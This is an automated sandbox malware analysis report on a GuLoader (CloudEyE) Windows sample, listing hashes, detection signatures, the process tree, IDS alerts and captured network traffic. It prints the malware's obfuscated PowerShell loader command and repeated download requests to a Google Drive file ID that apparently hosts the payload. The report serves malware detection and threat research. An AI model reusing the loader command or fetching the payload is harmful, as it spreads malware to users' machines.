Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ro7eoySJ9q.exe

Overview

General Information

Sample name:ro7eoySJ9q.exe
renamed because original name is a hash value
Original sample name:ebda1db301f4e3e3500292b8c519298d577cb9908b94f106a3cbe8c83136a423.exe
Analysis ID:1588610
MD5:69c59075bc9ffd11bf75080cfe44f29e
SHA1:e1cb7f85eb9236fad345bc1e3f941219cdf84edc
SHA256:ebda1db301f4e3e3500292b8c519298d577cb9908b94f106a3cbe8c83136a423
Tags:exeGuLoadersigneduser-adrian__luca
Infos:

Detection

GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ro7eoySJ9q.exe (PID: 6732 cmdline: "C:\Users\user\Desktop\ro7eoySJ9q.exe" MD5: 69C59075BC9FFD11BF75080CFE44F29E)
    • powershell.exe (PID: 2572 cmdline: "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 988 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.2832325462.000000000A25B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000008.00000002.3416961233.0000000004BFB000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      System Summary

      barindex
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 216.58.206.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 988, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49985
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2572, TargetFilename: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)" , CommandLine: "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ro7eoySJ9q.exe", ParentImage: C:\Users\user\Desktop\ro7eoySJ9q.exe, ParentProcessId: 6732, ParentProcessName: ro7eoySJ9q.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)" , ProcessId: 2572, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-11T03:08:50.343581+010028032702Potentially Bad Traffic192.168.2.649985216.58.206.78443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exeReversingLabs: Detection: 60%
      Source: ro7eoySJ9q.exeReversingLabs: Detection: 60%
      Source: ro7eoySJ9q.exeVirustotal: Detection: 72%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 88.3% probability
      Source: ro7eoySJ9q.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49985 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.6:49986 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.6:49988 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49989 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49991 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.6:49997 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:49998 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50000 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50002 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50006 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50008 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50010 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50012 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50014 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50016 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50018 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50020 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50022 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50024 version: TLS 1.2
      Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2825974414.0000000008771000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdbr source: powershell.exe, 00000002.00000002.2825974414.0000000008757000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \System.Core.pdbi$S source: powershell.exe, 00000002.00000002.2825974414.0000000008771000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055D5
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_00406089 FindFirstFileW,FindClose,0_2_00406089
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49985 -> 216.58.206.78:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
